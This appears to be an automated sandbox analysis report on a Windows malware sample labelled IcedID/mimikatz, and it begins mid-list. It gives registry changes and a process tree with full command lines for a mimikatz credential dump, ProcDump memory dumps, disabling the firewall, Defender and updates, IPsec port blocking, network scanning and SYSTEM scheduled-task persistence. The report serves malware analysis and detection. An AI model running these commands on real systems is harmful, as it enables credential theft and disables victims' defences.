"1" kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" detvrlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ detvrlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" detvrlv.exe Key created \REGISTRY\USER\.DEFAULT\Software kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing detvrlv.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" detvrlv.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1484 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 464 2024-05-21_91d710a684656f192c935f5c7767cf34_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 26 IoCs
description pid Process Token: SeDebugPrivilege 464 2024-05-21_91d710a684656f192c935f5c7767cf34_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2692 detvrlv.exe Token: SeDebugPrivilege 1912 detvrlv.exe Token: SeDebugPrivilege 1664 vfshost.exe Token: SeDebugPrivilege 1552 kirzyyvlv.exe Token: SeLockMemoryPrivilege 2316 eilgmk.exe Token: SeLockMemoryPrivilege 2316 eilgmk.exe Token: SeDebugPrivilege 380 kirzyyvlv.exe Token: SeDebugPrivilege 3764 kirzyyvlv.exe Token: SeDebugPrivilege 4328 kirzyyvlv.exe Token: SeDebugPrivilege 4308 kirzyyvlv.exe Token: SeDebugPrivilege 1540 kirzyyvlv.exe Token: SeDebugPrivilege 1228 kirzyyvlv.exe Token: SeDebugPrivilege 3940 kirzyyvlv.exe Token: SeDebugPrivilege 2364 kirzyyvlv.exe Token: SeDebugPrivilege 4364 kirzyyvlv.exe Token: SeDebugPrivilege 2820 kirzyyvlv.exe Token: SeDebugPrivilege 1624 kirzyyvlv.exe Token: SeDebugPrivilege 224 kirzyyvlv.exe Token: SeDebugPrivilege 2364 kirzyyvlv.exe Token: SeDebugPrivilege 2448 kirzyyvlv.exe Token: SeDebugPrivilege 3284 kirzyyvlv.exe Token: SeDebugPrivilege 3176 kirzyyvlv.exe Token: SeDebugPrivilege 3056 kirzyyvlv.exe Token: SeDebugPrivilege 5428 kirzyyvlv.exe Token: SeDebugPrivilege 6308 kirzyyvlv.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 464 2024-05-21_91d710a684656f192c935f5c7767cf34_hacktools_icedid_mimikatz.exe 464 2024-05-21_91d710a684656f192c935f5c7767cf34_hacktools_icedid_mimikatz.exe 2692 detvrlv.exe 2692 detvrlv.exe 1912 detvrlv.exe 1912 detvrlv.exe 3188 xohudmc.exe 1544 ascsso.exe 4328 detvrlv.exe 4328 detvrlv.exe 6840 detvrlv.exe 6840 detvrlv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 464 wrote to memory of 3584 464 2024-05-21_91d710a684656f192c935f5c7767cf34_hacktools_icedid_mimikatz.exe 90 PID 464 wrote to memory of 3584 464 2024-05-21_91d710a684656f192c935f5c7767cf34_hacktools_icedid_mimikatz.exe 90 PID 464 wrote to memory of 3584 464 2024-05-21_91d710a684656f192c935f5c7767cf34_hacktools_icedid_mimikatz.exe 90 PID 3584 wrote to memory of 1484 3584 cmd.exe 92 PID 3584 wrote to memory of 1484 3584 cmd.exe 92 PID 3584 wrote to memory of 1484 3584 cmd.exe 92 PID 3584 wrote to memory of 2692 3584 cmd.exe 100 PID 3584 wrote to memory of 2692 3584 cmd.exe 100 PID 3584 wrote to memory of 2692 3584 cmd.exe 100 PID 1912 wrote to memory of 4604 1912 detvrlv.exe 103 PID 1912 wrote to memory of 4604 1912 detvrlv.exe 103 PID 1912 wrote to memory of 4604 1912 detvrlv.exe 103 PID 4604 wrote to memory of 2332 4604 cmd.exe 105 PID 4604 wrote to memory of 2332 4604 cmd.exe 105 PID 4604 wrote to memory of 2332 4604 cmd.exe 105 PID 4604 wrote to memory of 3636 4604 cmd.exe 106 PID 4604 wrote to memory of 3636 4604 cmd.exe 106 PID 4604 wrote to memory of 3636 4604 cmd.exe 106 PID 4604 wrote to memory of 1640 4604 cmd.exe 107 PID 4604 wrote to memory of 1640 4604 cmd.exe 107 PID 4604 wrote to memory of 1640 4604 cmd.exe 107 PID 4604 wrote to memory of 676 4604 cmd.exe 108 PID 4604 wrote to memory of 676 4604 cmd.exe 108 PID 4604 wrote to memory of 676 4604 cmd.exe 108 PID 1912 wrote to memory of 3164 1912 detvrlv.exe 109 PID 1912 wrote to memory of 3164 1912 detvrlv.exe 109 PID 1912 wrote to memory of 3164 1912 detvrlv.exe 109 PID 4604 wrote to memory of 3640 4604 cmd.exe 112 PID 4604 wrote to memory of 3640 4604 cmd.exe 112 PID 4604 wrote to memory of 3640 4604 cmd.exe 112 PID 4604 wrote to memory of 4560 4604 cmd.exe 113 PID 4604 wrote to memory of 4560 4604 cmd.exe 113 PID 4604 wrote to memory of 4560 4604 cmd.exe 113 PID 1912 wrote to memory of 4576 1912 detvrlv.exe 114 PID 1912 wrote to memory of 4576 1912 detvrlv.exe 114 PID 1912 wrote to memory of 4576 1912 detvrlv.exe 114 PID 1912 wrote to memory of 4612 1912 detvrlv.exe 116 PID 1912 wrote to memory of 4612 1912 detvrlv.exe 116 PID 1912 wrote to memory of 4612 1912 detvrlv.exe 116 PID 1912 wrote to memory of 2056 1912 detvrlv.exe 120 PID 1912 wrote to memory of 2056 1912 detvrlv.exe 120 PID 1912 wrote to memory of 2056 1912 detvrlv.exe 120 PID 2056 wrote to memory of 3788 2056 cmd.exe 122 PID 2056 wrote to memory of 3788 2056 cmd.exe 122 PID 2056 wrote to memory of 3788 2056 cmd.exe 122 PID 3788 wrote to memory of 4140 3788 wpcap.exe 123 PID 3788 wrote to memory of 4140 3788 wpcap.exe 123 PID 3788 wrote to memory of 4140 3788 wpcap.exe 123 PID 4140 wrote to memory of 3048 4140 net.exe 125 PID 4140 wrote to memory of 3048 4140 net.exe 125 PID 4140 wrote to memory of 3048 4140 net.exe 125 PID 3788 wrote to memory of 1924 3788 wpcap.exe 126 PID 3788 wrote to memory of 1924 3788 wpcap.exe 126 PID 3788 wrote to memory of 1924 3788 wpcap.exe 126 PID 1924 wrote to memory of 1000 1924 net.exe 128 PID 1924 wrote to memory of 1000 1924 net.exe 128 PID 1924 wrote to memory of 1000 1924 net.exe 128 PID 3788 wrote to memory of 3188 3788 wpcap.exe 129 PID 3788 wrote to memory of 3188 3788 wpcap.exe 129 PID 3788 wrote to memory of 3188 3788 wpcap.exe 129 PID 3188 wrote to memory of 1544 3188 net.exe 131 PID 3188 wrote to memory of 1544 3188 net.exe 131 PID 3188 wrote to memory of 1544 3188 net.exe 131 PID 3788 wrote to memory of 3992 3788 wpcap.exe 132
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2084
-
C:\Windows\TEMP\llebqlbic\eilgmk.exe"C:\Windows\TEMP\llebqlbic\eilgmk.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-21_91d710a684656f192c935f5c7767cf34_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-21_91d710a684656f192c935f5c7767cf34_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\munqipvc\detvrlv.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1484
-
-
C:\Windows\munqipvc\detvrlv.exeC:\Windows\munqipvc\detvrlv.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2692
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3404,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=3804 /prefetch:81⤵PID:2704
-
C:\Windows\munqipvc\detvrlv.exeC:\Windows\munqipvc\detvrlv.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2332
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:3636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1640
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3640
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:4560
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:3164
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:4576
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:4612
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nmrmyinid\mirzmlbjb\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\nmrmyinid\mirzmlbjb\wpcap.exeC:\Windows\nmrmyinid\mirzmlbjb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:3048
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:1000
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:1544
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:3992
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:3044
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2600
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4576
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:1852
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4188
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:736
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:3740
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nmrmyinid\mirzmlbjb\iuatpesve.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nmrmyinid\mirzmlbjb\Scant.txt2⤵PID:3360
-
C:\Windows\nmrmyinid\mirzmlbjb\iuatpesve.exeC:\Windows\nmrmyinid\mirzmlbjb\iuatpesve.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nmrmyinid\mirzmlbjb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nmrmyinid\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\nmrmyinid\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:2364 -
C:\Windows\nmrmyinid\Corporate\vfshost.exeC:\Windows\nmrmyinid\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ikmrdnrib" /ru system /tr "cmd /c C:\Windows\ime\detvrlv.exe"2⤵PID:1544
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4284
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ikmrdnrib" /ru system /tr "cmd /c C:\Windows\ime\detvrlv.exe"3⤵
- Creates scheduled task(s)
PID:4612
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nutvcvqbm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\munqipvc\detvrlv.exe /p everyone:F"2⤵PID:3780
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nutvcvqbm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\munqipvc\detvrlv.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:4576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "cyvgmizme" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\llebqlbic\eilgmk.exe /p everyone:F"2⤵PID:380
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2224
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "cyvgmizme" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\llebqlbic\eilgmk.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:2720
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:1856
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:2620
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4376
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:3808
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:4904
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:3636
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4852
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:2608
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:5016
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:2284
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:2512
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:1416
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:64
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:2620
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:3932
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:4932
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:1600
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:3584
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:2028
-
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 776 C:\Windows\TEMP\nmrmyinid\776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:224
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:3152
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:1000
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:2512
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:4600
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:904
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:4732
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:4612
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:1660
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:2364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:2108
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:2332
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:5112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:3756
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:3768
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:3188
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 1016 C:\Windows\TEMP\nmrmyinid\1016.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:380
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 2084 C:\Windows\TEMP\nmrmyinid\2084.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3764
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 2652 C:\Windows\TEMP\nmrmyinid\2652.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 2852 C:\Windows\TEMP\nmrmyinid\2852.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4308
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 2864 C:\Windows\TEMP\nmrmyinid\2864.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 3088 C:\Windows\TEMP\nmrmyinid\3088.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1228
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 3876 C:\Windows\TEMP\nmrmyinid\3876.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 3980 C:\Windows\TEMP\nmrmyinid\3980.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 4084 C:\Windows\TEMP\nmrmyinid\4084.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4364
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 1360 C:\Windows\TEMP\nmrmyinid\1360.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
C:\Windows\TEMP\nmrmyinid\kirzyyvlv.exeC:\Windows\TEMP\nmrmyinid\kirzyyvlv.exe -accepteula -mp 3620 C:\Windows\TEMP\nmrmyinid\3620.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
